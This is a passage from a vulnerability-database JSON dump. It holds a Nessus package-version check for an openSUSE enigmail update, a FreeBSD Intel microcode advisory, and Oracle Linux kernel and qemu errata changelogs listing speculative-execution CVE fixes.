[{"type": "oraclelinux", "idList": ["ELSA-2019-4702", "ELSA-2019-4713", "ELSA-2018-3041"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2019-4713.NASL", "DEBIAN_DSA-4469.NASL", "EULEROS_SA-2019-1588.NASL", "EULEROS_SA-2019-1586.NASL", "REDHAT-RHSA-2019-1190.NASL", "EULEROS_SA-2019-1411.NASL", "REDHAT-RHSA-2019-1170.NASL", "SUSE_SU-2016-2898-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704469", "OPENVAS:1361412562310876390"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4469-1:B9B08"]}, {"type": "mskb", "idList": ["KB4494441"]}, {"type": "redhat", "idList": ["RHSA-2019:1190", "RHSA-2019:1170"]}, {"type": "threatpost", "idList": ["THREATPOST:CBFAA2319AF4281EC1DD5C4682601942"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/IMPERVA_SECURESPHERE_EXEC"]}], "modified": "2019-11-01T03:01:30"}, "score": {"value": 1.2, "vector": "NONE", "modified": "2019-11-01T03:01:30"}, "vulnersScore": 1.2}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1403.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105452);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/12/26 18:12:02 $\");\n\n script_name(english:\"openSUSE Security Update : enigmail (openSUSE-2017-1403)\");\n script_summary(english:\"Check for the openSUSE-2017-1403 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for enigmail to version 1.9.9 fixes the following issues\n(boo#1073858) :\n\n - Enigmail could be coerced to use a malicious PGP public\n key with a corresponding secret key controlled by an\n attacker\n\n - Enigmail could have replayed encrypted content in\n partially encrypted e-mails, allowing a plaintext leak\n\n - Enigmail could be tricked into displaying incorrect\n signature verification results\n\n - Specially crafted content may cause denial of service\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1073858\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected enigmail package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"enigmail-1.9.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"enigmail-1.9.9-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"enigmail\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "105452", "cpe": ["cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:enigmail"], "scheme": null}

{"freebsd": [{"lastseen": "2019-11-26T01:24:12", "bulletinFamily": "unix", "description": "\nStarting with version 1.26, the devcpu-data port/package includes\n\tupdates and mitigations for the following technical and security\n\tadvisories (depending on CPU model).\nIntel TSX Updates (TAA) CVE-2019-11135 Voltage Modulation\n\tVulnerability CVE-2019-11139 MD_CLEAR Operations\n\tCVE-2018-12126 CVE-2018-12127 CVE-2018-12130 CVE-2018-11091\n\tTA Indirect Sharing CVE-2017-5715 EGETKEY CVE-2018-12126\n\tCVE-2018-12127 CVE-2018-12130 CVE-2018-11091 JCC SKX102\n\t Erratum \nUpdated microcode includes mitigations for\n\tCPU issues, but may also cause a performance regression due\n\tto the JCC erratum mitigation. Please visit\n\thttp://www.intel.com/benchmarks for further information.\n\t\nPlease visit http://www.intel.com/security for\n\tdetailed information on these advisories as well as a list of\n\tCPUs that are affected.\nOperating a CPU without the latest microcode may result in erratic or\n\tunpredictable behavior, including system crashes and lock ups.\n\tCertain issues listed in this advisory may result in the leakage of\n\tprivileged system information to unprivileged users. Please refer to\n\tthe security advisories listed above for detailed information.\n", "modified": "2019-11-14T00:00:00", "published": "2019-11-14T00:00:00", "id": "FBE10A8A-05A1-11EA-9DFA-F8B156AC3FF9", "href": "https://vuxml.freebsd.org/freebsd/fbe10a8a-05a1-11ea-9dfa-f8b156ac3ff9.html", "title": "FreeBSD -- Intel CPU Microcode Update", "type": "freebsd", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-08-04T23:47:08", "bulletinFamily": "unix", "description": "kernel\n- 2.6.18-419.0.0.0.13\n- x86/speculation/mds: Conditionally clear CPU buffers on idle entry (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Call VERW on NMI path when returning to user (Patrick Colp) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Fix verw usage to use memory operand (Patrick Colp) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Make cpu_matches() __cpuinit (Patrick Colp) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add mitigation mode VMWERV (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add sysfs reporting for MDS (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add mitigation control for MDS (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Improve coverage for MDS vulnerability (Boris Ostrovsky) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Clear CPU buffers on exit to user (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091} \n- x86/speculation/mds: Add mds_clear_cpu_buffers() (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add BUG_MSBDS_ONLY (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add basic bug infrastructure for MDS (Andi Kleen) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation: Consolidate CPU whitelists (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- 2.6.18-419.0.0.0.12\n- [x86] mm/dump_pagetables: Add a check_l1tf debugfs file (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] cpu: Make flush_l1d visible in /proc/cpuinfo (Chris von Recklinghausen) [1593378]\n- [x86] cpufeatures: Add detection of L1D cache flush support. (Chris von Recklinghausen) [1593378]\n- [x86] l1tf: protect _PAGE_FILE PTEs against speculation (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Extend 64bit swap file size limit (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] bugs: Move the l1tf function and define pr_fmt properly (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Limit swap file size to MAX_PA/2 (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Add sysfs reporting for l1tf (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Protect PROT_NONE PTEs against speculation (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Protect swap entries against L1TF (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Change order of offset/type in swap entry (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Increase 32bit PAE __PHYSICAL_PAGE_SHIFT (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] cpu: Fix incorrect vulnerabilities files function prototypes (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] bugs: Export the internal __cpu_bugs variable (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] spec_ctrl: sync with upstream cpu_set_bug_bits() (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] intel-family.h: Add GEMINI_LAKE SOC (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] mm: Fix swap entry comment and macro (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] mm: Move swap offset/type up in PTE to work around erratum (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] cpufeatures: Resolve X86_FEATURE_SMEP definition conflict (Radomir Vrbovsky) [1570474]\n- [x86] fix kexec load warnings with PTI enabled (Rafael Aquini) [1576191]\n- [x86] ia32entry: make target ia32_ret_from_sys_call the common exit point to long-mode (Rafael Aquini) [1570474] {CVE-2009-2910}\n- [x86] spec_ctrl: only perform RSB stuffing on SMEP capable CPUs (Rafael Aquini) [1570474] {CVE-2009-2910}\n- [net] tcp: fix 0 divide in __tcp_select_window (Davide Caratti) [1488343] {CVE-2017-14106}\n- [net] tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Davide Caratti) [1488343] {CVE-2017-14106}\n- [x86] adjust / fix LDT handling for PTI (Rafael Aquini) [1584622]\n- [x86] Fix up /proc/cpuinfo entries (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [kernel] spec_ctrl: work around broken microcode (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] Only expose PR_{GET, SET}_SPECULATION_CTRL if CONFIG_SPEC_CTRL is defined (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] misc changes to fix i386 builds (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] amd: Disable AMD SSBD mitigation in a VM (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] spec_ctrl: add support for SSBD to RHEL IBRS entry/exit macros (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Rename _RDS to _SSBD (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] speculation: Add prctl for Speculative Store Bypass mitigation (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] process: Allow runtime control of Speculative Store Bypass (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] 64: add skeletonized version of __switch_to_xtra (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [kernel] prctl: Add speculation control prctls (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs/AMD: Add support to disable RDS on Fam[15, 16, 17]h if requested (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] spec_ctrl: Sync up RDS setting with IBRS code (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Provide boot parameters for the spec_store_bypass_disable mitigation (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Expose the /sys/../spec_store_bypass and X86_BUG_SPEC_STORE_BYPASS (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] include: add latest intel-family.h from RHEL6 (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Read SPEC_CTRL MSR during boot and re-use reserved bits (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] spec_ctrl: Use separate PCP variables for IBRS entry and exit (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpuid: Fix up IBRS/IBPB/STIBP feature bits on Intel (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpufeatures: Clean up Spectre v2 related CPUID flags (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpufeatures: Add AMD feature bits for Speculation Control (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpufeatures: Add Intel feature bits for Speculation (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpu: Add driver auto probing for x86 features (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- 2.6.18-419.0.0.0.11\n- x86_64/entry: Don't use IST entry for #BP stack [orabug 28452062] {CVE-2018-8897}\n- 2.6.18-419.0.0.0.10\n- Backport CVE-2017-5715 to RHCK/OL5 [orabug 27787723]\n- 2.6.18-419.0.0.0.9\n- rebuild with retpoline compiler\n- 2.6.18-419.0.0.0.8\n- Backport CVEs to RHCK/OL5 [orabug 27547712] {CVE-2017-5753} {CVE-2017-5754}\n- 2.6.18-419.0.0.0.5\n- [fs] fix kernel panic on boot on ia64 guests (Honglei Wang) [orabug 26934100]\n- 2.6.18-419.0.0.0.4\n- [fs] fix bug in loading of PIE binaries (Michael Davidson) [orabug 26916951] {CVE-2017-1000253}\n- 2.6.18-419.0.0.0.3\n- nfsd: stricter decoding of write-like NFSv2/v3 ops (J. Bruce Fields) [orabug 26586706] {CVE-2017-7895}", "modified": "2019-08-04T00:00:00", "published": "2019-08-04T00:00:00", "id": "ELSA-2019-4702", "href": "http://linux.oracle.com/errata/ELSA-2019-4702.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-04T23:45:10", "bulletinFamily": "unix", "description": "kernel\n- 2.6.18-419.0.0.0.14\n- x86/speculation/mds: Conditionally clear CPU buffers on idle entry (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Call VERW on NMI path when returning to user (Patrick Colp) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Fix verw usage to use memory operand (Patrick Colp) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Make cpu_matches() __cpuinit (Patrick Colp) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add mitigation mode VMWERV (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add sysfs reporting for MDS (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add mitigation control for MDS (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Improve coverage for MDS vulnerability (Boris Ostrovsky) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Clear CPU buffers on exit to user (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091} \n- x86/speculation/mds: Add mds_clear_cpu_buffers() (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add BUG_MSBDS_ONLY (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Add basic bug infrastructure for MDS (Andi Kleen) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- x86/speculation/mds: Consolidate CPU whitelists (Thomas Gleixner) [orabug 29821515] {CVE-2018-12126} {CVE-2018-12130} {CVE-2018-12127} {CVE-2019-11091}\n- 2.6.18-419.0.0.0.12\n- [x86] mm/dump_pagetables: Add a check_l1tf debugfs file (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] cpu: Make flush_l1d visible in /proc/cpuinfo (Chris von Recklinghausen) [1593378]\n- [x86] cpufeatures: Add detection of L1D cache flush support. (Chris von Recklinghausen) [1593378]\n- [x86] l1tf: protect _PAGE_FILE PTEs against speculation (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Extend 64bit swap file size limit (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] bugs: Move the l1tf function and define pr_fmt properly (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Limit swap file size to MAX_PA/2 (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Add sysfs reporting for l1tf (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Protect PROT_NONE PTEs against speculation (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Protect swap entries against L1TF (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Change order of offset/type in swap entry (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] speculation/l1tf: Increase 32bit PAE __PHYSICAL_PAGE_SHIFT (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] cpu: Fix incorrect vulnerabilities files function prototypes (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] bugs: Export the internal __cpu_bugs variable (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] spec_ctrl: sync with upstream cpu_set_bug_bits() (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] intel-family.h: Add GEMINI_LAKE SOC (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] mm: Fix swap entry comment and macro (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] mm: Move swap offset/type up in PTE to work around erratum (Chris von Recklinghausen) [1593378] {CVE-2018-3620}\n- [x86] cpufeatures: Resolve X86_FEATURE_SMEP definition conflict (Radomir Vrbovsky) [1570474]\n- [x86] fix kexec load warnings with PTI enabled (Rafael Aquini) [1576191]\n- [x86] ia32entry: make target ia32_ret_from_sys_call the common exit point to long-mode (Rafael Aquini) [1570474] {CVE-2009-2910}\n- [x86] spec_ctrl: only perform RSB stuffing on SMEP capable CPUs (Rafael Aquini) [1570474] {CVE-2009-2910}\n- [net] tcp: fix 0 divide in __tcp_select_window (Davide Caratti) [1488343] {CVE-2017-14106}\n- [net] tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Davide Caratti) [1488343] {CVE-2017-14106}\n- [x86] adjust / fix LDT handling for PTI (Rafael Aquini) [1584622]\n- [x86] Fix up /proc/cpuinfo entries (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [kernel] spec_ctrl: work around broken microcode (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] Only expose PR_{GET, SET}_SPECULATION_CTRL if CONFIG_SPEC_CTRL is defined (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] misc changes to fix i386 builds (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] amd: Disable AMD SSBD mitigation in a VM (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] spec_ctrl: add support for SSBD to RHEL IBRS entry/exit macros (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Rename _RDS to _SSBD (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] speculation: Add prctl for Speculative Store Bypass mitigation (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] process: Allow runtime control of Speculative Store Bypass (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] 64: add skeletonized version of __switch_to_xtra (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [kernel] prctl: Add speculation control prctls (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs/AMD: Add support to disable RDS on Fam[15, 16, 17]h if requested (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] spec_ctrl: Sync up RDS setting with IBRS code (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Provide boot parameters for the spec_store_bypass_disable mitigation (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Expose the /sys/../spec_store_bypass and X86_BUG_SPEC_STORE_BYPASS (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] include: add latest intel-family.h from RHEL6 (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] bugs: Read SPEC_CTRL MSR during boot and re-use reserved bits (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] spec_ctrl: Use separate PCP variables for IBRS entry and exit (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpuid: Fix up IBRS/IBPB/STIBP feature bits on Intel (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpufeatures: Clean up Spectre v2 related CPUID flags (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpufeatures: Add AMD feature bits for Speculation Control (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpufeatures: Add Intel feature bits for Speculation (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- [x86] cpu: Add driver auto probing for x86 features (Chris von Recklinghausen) [1566896] {CVE-2018-3639}\n- 2.6.18-419.0.0.0.11\n- x86_64/entry: Don't use IST entry for #BP stack [orabug 28452062] {CVE-2018-8897}\n- 2.6.18-419.0.0.0.10\n- Backport CVE-2017-5715 to RHCK/OL5 [orabug 27787723]\n- 2.6.18-419.0.0.0.9\n- rebuild with retpoline compiler\n- 2.6.18-419.0.0.0.8\n- Backport CVEs to RHCK/OL5 [orabug 27547712] {CVE-2017-5753} {CVE-2017-5754}\n- 2.6.18-419.0.0.0.5\n- [fs] fix kernel panic on boot on ia64 guests (Honglei Wang) [orabug 26934100]\n- 2.6.18-419.0.0.0.4\n- [fs] fix bug in loading of PIE binaries (Michael Davidson) [orabug 26916951] {CVE-2017-1000253}\n- 2.6.18-419.0.0.0.3\n- nfsd: stricter decoding of write-like NFSv2/v3 ops (J. Bruce Fields) [orabug 26586706] {CVE-2017-7895}", "modified": "2019-08-04T00:00:00", "published": "2019-08-04T00:00:00", "id": "ELSA-2019-4732", "href": "http://linux.oracle.com/errata/ELSA-2019-4732.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-11T06:46:07", "bulletinFamily": "unix", "description": "[15:3.1.0-5.el7]\n- Only enable the halt poll control MSR if it is supported by the host (Mark\n Kanda) [Orabug: 29946722]\n[15:3.1.0-4.el7]\n- kvm: i386: halt poll control MSR support (Marcelo Tosatti) [Orabug: 29933278]\n- Document CVEs as fixed: CVE-2017-9524, CVE-2017-6058, CVE-2017-5931 (Mark Kanda) [Orabug: 29886908] {CVE-2017-5931} {CVE-2017-6058} {CVE-2017-9524}\n- pvrdma: release device resources in case of an error (Prasad J Pandit) [Orabug: 29056678] {CVE-2018-20123}\n- qxl: check release info object (Prasad J Pandit) [Orabug: 29886906] {CVE-2019-12155}\n- target/i386: add MDS-NO feature (Paolo Bonzini) [Orabug: 29820428] {CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- docs: recommend use of md-clear feature on all Intel CPUs (Daniel P. Berrange) [Orabug: 29820428] {CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- target/i386: define md-clear bit (Paolo Bonzini) [Orabug: 29820428] {CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- pvh: block migration if booting using PVH (Liam Merwick) [Orabug: 29796676]\n- hw/i386/pc: run the multiboot loader before the PVH loader (Stefano Garzarella) [Orabug: 29796676]\n- optionrom/pvh: load initrd from fw_cfg (Stefano Garzarella) [Orabug: 29796676]\n- hw/i386/pc: use PVH option rom (Stefano Garzarella) [Orabug: 29796676]\n- qemu.spec: add pvh.bin to %files (Liam Merwick) [Orabug: 29796676]\n- optionrom: add new PVH option rom (Stefano Garzarella) [Orabug: 29796676]\n- linuxboot_dma: move common functions in a new header (Stefano Garzarella) [Orabug: 29796676]\n- linuxboot_dma: remove duplicate definitions of FW_CFG (Stefano Garzarella) [Orabug: 29796676]\n- pvh: load initrd and expose it through fw_cfg (Stefano Garzarella) [Orabug: 29796676]\n- pvh: Boot uncompressed kernel using direct boot ABI (Liam Merwick) [Orabug: 29796676]\n- pvh: Add x86/HVM direct boot ABI header file (Liam Merwick) [Orabug: 29796676]\n- elf-ops.h: Add get_elf_note_type() (Liam Merwick) [Orabug: 29796676]\n- elf: Add optional function ptr to load_elf() to parse ELF notes (Liam Merwick) [Orabug: 29796676]", "modified": "2019-07-10T00:00:00", "published": "2019-07-10T00:00:00", "id": "ELSA-2019-4713", "href": "http://linux.oracle.com/errata/ELSA-2019-4713.html", "title": "qemu security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-01T03:18:34", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[15:3.1.0-5.el7]\n- Only enable the halt poll control MSR if it is supported by the host (Mark\nKanda) [Orabug: 29946722]\n\n[15:3.1.0-4.el7]\n- kvm: i386: halt poll control MSR support (Marcelo Tosatti) [Orabug: \n29933278]\n- Document CVEs as fixed: CVE-2017-9524, CVE-2017-6058, CVE-2017-5931 \n(Mark Kanda) [Orabug: 29886908] {CVE-2017-5931} {CVE-2017-6058} \n{CVE-2017-9524}\n- pvrdma: release device resources in case of an error (Prasad J Pandit) \n[Orabug: 29056678] {CVE-2018-20123}\n- qxl: check release info object (Prasad J Pandit) [Orabug: 29886906] \n{CVE-2019-12155}\n- target/i386: add MDS-NO feature (Paolo Bonzini) [Orabug: 29820428] \n{CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- docs: recommend use of md-clear feature on all Intel CPUs (Daniel P. \nBerrang&eacute ) [Orabug: 29820428] {CVE-2018-12126} {CVE-2018-12127} \n{CVE-2018-12130} {CVE-2019-11091}\n- target/i386: define md-clear bit (Paolo Bonzini) [Orabug: 29820428] \n{CVE-2018-12126} {CVE-2018-12127} {CVE-2018-12130} {CVE-2019-11091}\n- pvh: block migration if booting using PVH (Liam Merwick) [Orabug: \n29796676]\n- hw/i386/pc: run the multiboot loader before the PVH loader (Stefano \nGarzarella) [Orabug: 29796676]\n- optionrom/pvh: load initrd from fw_cfg (Stefano Garzarella) [Orabug: \n29796676]\n- hw/i386/pc: use PVH option rom (Stefano Garzarella) [Orabug: 29796676]\n- qemu.spec: add pvh.bin to %files (Liam Merwick) [Orabug: 29796676]\n- optionrom: add new PVH option rom (Stefano Garzarella) [Orabug: 29796676]\n- linuxboot_dma: move common functions in a new header (Stefano \nGarzarella) [Orabug: 29796676]\n- linuxboot_dma: remove duplicate definitions of FW_CFG (Stefano \nGarzarella) [Orabug: 29796676]\n- pvh: load initrd and expose it through fw_cfg (Stefano Garzarella) \n[Orabug: 29796676]\n- pvh: Boot uncompressed kernel using direct boot 